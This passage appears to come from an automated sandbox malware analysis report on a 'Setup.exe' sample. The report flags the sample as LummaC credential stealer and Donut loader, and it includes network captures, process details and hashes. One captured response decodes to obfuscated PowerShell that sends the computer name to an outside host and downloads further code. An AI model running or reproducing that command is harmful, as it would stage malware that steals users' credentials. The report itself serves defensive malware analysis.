                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rArOFE%2Fm1EQ1iMcKXcXe%2B9Ne9ZW3fD6OEypvKh1KgH%2BJAEqqq%2Befuh7EzO6vTeUJ4RD91RVMmwoLR770PLFtLf1qxZ06VjGQwn29t16tJ0fNQQtGfmZUt%2Frzqq7rbCWeaBNkQTU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8fd4fd935a0643da-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2174&min_rtt=2160&rtt_var=838&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1016&delivery_rate=1284645&cwnd=203&unsent_bytes=0&cid=bf9e524326390ef8&ts=462&x=0"
                                                                                                                                                    2025-01-05 16:54:30 UTC218INData Raw: 64 34 0d 0a 4b 31 4c 43 77 39 32 35 35 62 66 34 4a 30 42 6e 75 47 52 6b 6c 50 54 37 30 54 64 73 4b 37 77 32 43 73 61 69 75 55 69 41 39 66 56 77 4b 65 43 32 2f 34 50 48 33 34 78 54 4d 42 53 43 4f 45 76 49 32 35 69 30 55 42 6b 46 7a 31 35 6c 74 76 36 57 63 4c 58 43 77 52 6c 6b 38 50 66 70 6a 37 6d 59 69 45 39 75 45 38 41 51 52 72 6a 57 6e 61 55 56 56 68 6d 51 46 47 2f 6b 6d 49 67 31 72 49 37 58 58 6e 44 34 34 62 58 4e 6b 63 65 4c 48 52 78 49 35 45 73 50 2b 4a 32 4c 70 30 49 42 51 73 39 44 59 2b 6a 52 30 53 66 77 71 64 70 43 50 4c 61 63 76 74 57 56 36 49 74 50 49 55 6e 4d 48 42 43 32 32 4e 6d 33 51 30 34 52 6a 42 6f 6f 6f 34 43 44 65 50 32 6f 0d 0a
                                                                                                                                                    Data Ascii: d4K1LCw9255bf4J0BnuGRklPT70TdsK7w2CsaiuUiA9fVwKeC2/4PH34xTMBSCOEvI25i0UBkFz15ltv6WcLXCwRlk8Pfpj7mYiE9uE8AQRrjWnaUVVhmQFG/kmIg1rI7XXnD44bXNkceLHRxI5EsP+J2Lp0IBQs9DY+jR0SfwqdpCPLacvtWV6ItPIUnMHBC22Nm3Q04RjBooo4CDeP2o
                                                                                                                                                    2025-01-05 16:54:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    9192.168.2.449758185.161.251.214436860C:\Users\user\Desktop\Setup.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-05 16:54:30 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Host: cegu.shop
                                                                                                                                                    2025-01-05 16:54:31 UTC249INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx/1.26.2
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:30 GMT
                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                    Content-Length: 329
                                                                                                                                                    Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    ETag: "676c9e2a-149"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    2025-01-05 16:54:31 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                    Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:11:54:01
                                                                                                                                                    Start date:05/01/2025
                                                                                                                                                    Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:76'573'072 bytes
                                                                                                                                                    MD5 hash:2F84C8A115EB4FA477054B3915D6D156
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1892472910.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:false

                                                                                                                                                    Disassembly

                                                                                                                                                    Reset < >

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 03567417 Relevance: .3, Instructions: 282COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000003.1892306082.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Offset: 03561000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_3_3561000_Setup.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7d5467ae5c896c0221578ad023627d8236c7dd3bb092056234490bd001ca9636
                                                                                                                                                      • Instruction ID: 04b107f74874af4ea350a4ab117fac499f072b100111b710dc69817d1728a3a1
                                                                                                                                                      • Opcode Fuzzy Hash: 7d5467ae5c896c0221578ad023627d8236c7dd3bb092056234490bd001ca9636
                                                                                                                                                      • Instruction Fuzzy Hash: C0C1865254E7C11FD31387745868691BFB0AF13118F0E86EBC4C9CF8E3D259A98AD362